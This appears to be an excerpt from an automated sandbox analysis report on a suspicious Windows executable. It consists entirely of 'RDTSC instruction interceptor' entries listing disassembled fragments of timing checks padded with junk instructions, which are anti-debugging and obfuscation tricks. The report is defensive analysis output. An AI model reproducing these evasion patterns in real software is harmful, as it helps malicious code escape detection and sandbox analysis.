Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F54B22 second address: F54B27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F550C6 second address: F550CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F550CB second address: F550D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FF3408102F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F569AB second address: F569F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB10h 0x00000009 popad 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007FF34080AB10h 0x00000012 jmp 00007FF34080AB0Bh 0x00000017 popad 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jo 00007FF34080AB12h 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007FF34080AB0Ah 0x00000028 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F558EF second address: F558F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F558F4 second address: F558FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F582F3 second address: F582F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F582F7 second address: F5835B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FF34080AB08h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 jmp 00007FF34080AB12h 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007FF34080AB08h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000019h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 xchg eax, ebx 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F5835B second address: F58365 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF3408102F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F58365 second address: F5836A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F5836A second address: F58370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F5BFCD second address: F5BFDD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FF34080AB0Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F5A261 second address: F5A26B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FF3408102F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F5BFDD second address: F5BFE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F5BFE9 second address: F5BFED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F5DA0E second address: F5DA12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F5DA12 second address: F5DA23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edi 0x00000009 jng 00007FF3408102FCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F6158C second address: F61592 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F61592 second address: F61598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F61598 second address: F6159C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F6159C second address: F61633 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b ja 00007FF340810306h 0x00000011 push 00000000h 0x00000013 je 00007FF340810303h 0x00000019 jmp 00007FF3408102FDh 0x0000001e sub dword ptr [ebp+122D3542h], ebx 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push edx 0x00000029 call 00007FF3408102F8h 0x0000002e pop edx 0x0000002f mov dword ptr [esp+04h], edx 0x00000033 add dword ptr [esp+04h], 0000001Ch 0x0000003b inc edx 0x0000003c push edx 0x0000003d ret 0x0000003e pop edx 0x0000003f ret 0x00000040 mov dword ptr [ebp+12452F13h], ecx 0x00000046 jng 00007FF3408102FCh 0x0000004c xor edi, 345547FBh 0x00000052 jmp 00007FF340810306h 0x00000057 xchg eax, esi 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b jnc 00007FF3408102F6h 0x00000061 pushad 0x00000062 popad 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F6250C second address: F62512 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F62512 second address: F62516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F62516 second address: F62577 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FF34080AB08h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D37F6h], edx 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007FF34080AB08h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 movzx ebx, ax 0x00000048 push 00000000h 0x0000004a xchg eax, esi 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F62577 second address: F6257B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F6257B second address: F62581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F62581 second address: F62587 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F62587 second address: F6258B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F64461 second address: F644C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jne 00007FF3408102F8h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FF3408102F8h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 mov ebx, dword ptr [ebp+122D2B82h] 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007FF3408102F8h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 00000016h 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b push 00000000h 0x0000004d mov dword ptr [ebp+12484291h], edx 0x00000053 xchg eax, esi 0x00000054 pushad 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F636B7 second address: F636BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F636BB second address: F63715 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF3408102F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D38A5h], eax 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov ebx, edx 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 add di, 5C19h 0x00000028 mov eax, dword ptr [ebp+122D0C55h] 0x0000002e mov dword ptr [ebp+122D184Eh], edi 0x00000034 push FFFFFFFFh 0x00000036 add edi, 568EA3B1h 0x0000003c mov ebx, dword ptr [ebp+122D1BEFh] 0x00000042 nop 0x00000043 pushad 0x00000044 jmp 00007FF340810302h 0x00000049 push eax 0x0000004a push edx 0x0000004b push esi 0x0000004c pop esi 0x0000004d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F63715 second address: F63719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F64667 second address: F64682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF340810307h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F65748 second address: F6574C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F6660F second address: F66614 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F66614 second address: F66621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F6A3A3 second address: F6A3A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F6B48D second address: F6B491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F6C3E5 second address: F6C3EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F6C3EC second address: F6C403 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F6C403 second address: F6C407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F6C407 second address: F6C40B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F694AD second address: F694B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F6A5FB second address: F6A606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF34080AB06h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F6D314 second address: F6D319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F6C5B9 second address: F6C5BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F6C5BF second address: F6C5C4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F6D3CE second address: F6D3D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F6C662 second address: F6C666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: F6C666 second address: F6C66C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FABECD second address: FABED8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FF34080AB06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FAC04A second address: FAC04F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FAC04F second address: FAC057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FAC2DC second address: FAC2E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FAC2E0 second address: FAC2E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FAC2E4 second address: FAC2EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FAC2EF second address: FAC2F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FAC5AB second address: FAC5AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FB1243 second address: FB124D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF34080AB06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FB124D second address: FB125D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FF3408102F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FB06B1 second address: FB06BA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FB06BA second address: FB06C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FB06C0 second address: FB06C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FB07E4 second address: FB07E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FB07E8 second address: FB080F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB18h 0x00000007 jl 00007FF34080AB06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FB080F second address: FB0849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF340810306h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FF340810300h 0x00000012 pop eax 0x00000013 popad 0x00000014 js 00007FF340810318h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FB09BE second address: FB09CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 jnc 00007FF34080AB06h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FB0B1A second address: FB0B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FB97B6 second address: FB97D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b jc 00007FF34080AB06h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FB776E second address: FB7779 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FF3408102F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FB7779 second address: FB77B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF34080AB06h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f js 00007FF34080AB35h 0x00000015 jnc 00007FF34080AB0Eh 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF34080AB11h 0x00000022 push edx 0x00000023 pop edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FB78D7 second address: FB78E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF3408102FDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FB78E8 second address: FB78EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FB7A65 second address: FB7A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007FF3408102FEh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF340810304h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FB7A90 second address: FB7A94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FB7A94 second address: FB7AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF340810304h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jne 00007FF3408102FCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FB7DBC second address: FB7DD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB0Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FB7DD4 second address: FB7DD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FB86D5 second address: FB86D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FB8A06 second address: FB8A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FB8A0C second address: FB8A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FF34080AB08h 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FB8A1C second address: FB8A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF340810301h 0x0000000c jmp 00007FF3408102FFh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FB91E6 second address: FB91EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FB91EC second address: FB91F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FB91F2 second address: FB9205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF34080AB0Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FB9205 second address: FB9215 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF3408102F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FB94E9 second address: FB9505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FF34080AB14h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FB9505 second address: FB9512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe RDTSC instruction interceptor: First address: FB9512 second address: FB952B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF34080AB14h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
